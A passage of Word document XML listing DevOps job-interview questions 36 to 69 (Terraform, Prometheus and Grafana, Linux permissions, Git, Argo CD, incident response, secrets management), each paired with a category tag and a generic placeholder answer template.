        <w:t>A: A strong answer should directly address the Docker/Runtime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a container communicate with the Linux kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. Design a multi-cloud deployment using Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Architecture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Design a multi-cloud deployment using Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. What are the basic Terraform commands?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Fundamentals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the basic Terraform commands?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. What happens if the S3 bucket storing the Terraform state is accidentally deleted?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/State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happens if the S3 bucket storing the Terraform state is accidentally deleted?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. If the Terraform state becomes very large, how do you manage it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/State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the Terraform state becomes very large, how do you manage it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. Did you create Terraform modules from scratch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Modules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Did you create Terraform modules from scratch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. How many Terraform services/resources have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Experience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many Terraform services/resources have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. Where do you prefer to store Terraform state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/State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Where do you prefer to store Terraform state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. How would you design a monitoring solution for microservices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Architecture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design a monitoring solution for microservices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. What is the difference between monitoring and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Fundamentals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monitoring and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. Have you used Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Experience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used Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. How do you deploy Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Deployment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deploy Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. How do you expose application metrics to Prometheus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Metrics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expose application metrics to Prometheus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. How do you configure alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Alerting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Alerting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configure alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. Why do we use sudo instead of logging in as the root user?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Security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Why do we use sudo instead of logging in as the root user?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. Explain Linux file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Permissions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Linux file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Why should we avoid 777 permissions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Permissions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Why should we avoid 777 permissions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. Why do we have both /etc/passwd and /etc/shadow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Security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Why do we have both /etc/passwd and /etc/shadow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. Write a shell script to find files with 777 permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Scripting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Scripting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Write a shell script to find files with 777 permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. How have you used Python in DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Python/DevOps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have you used Python in DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Write a Python script to upload a file to an S3 bucket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Python/Automation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Write a Python script to upload a file to an S3 bucket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. Name the common Git commands you use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git/Fundamentals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Name the common Git commands you use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. How do you clone only a single branch from a repository?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git/Branches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git/Branches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clone only a single branch from a repository?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. What is git cherry-pick?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git/Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git/Workflow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git cherry-pick?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. What is the difference between git clone, git fetch, and git pull?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git/Fundamentals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git clone, git fetch, and git pull?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. Have you worked with Argo CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Argo CD/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Argo CD/Experience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with Argo CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. What is GitOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Argo CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Argo CD/GitOps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GitOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. What is your hands-on experience with Argo CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Argo CD/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Argo CD/Experience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your hands-on experience with Argo CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q63. How do you handle a production incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Support/Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Support/Incident Response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handle a production incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q64. Do you log in directly to production servers, or do you follow an incident management process?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Support/Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Support/Process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 you log in directly to production servers, or do you follow an incident management process?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q65. How do you communicate during a Sev-1 incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Support/Communication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Support/Communication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communicate during a Sev-1 incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q66. How do you improve application security in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Application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improve application security in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q67. How do you manage secrets securely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Secrets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manage secrets securely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q68. How do you secure Docker images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Containers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secure Docker images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q69. Do you have any questions for us?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Closing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Closing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 you have any questions for us?</w:t>
      </w:r>
    </w:p>
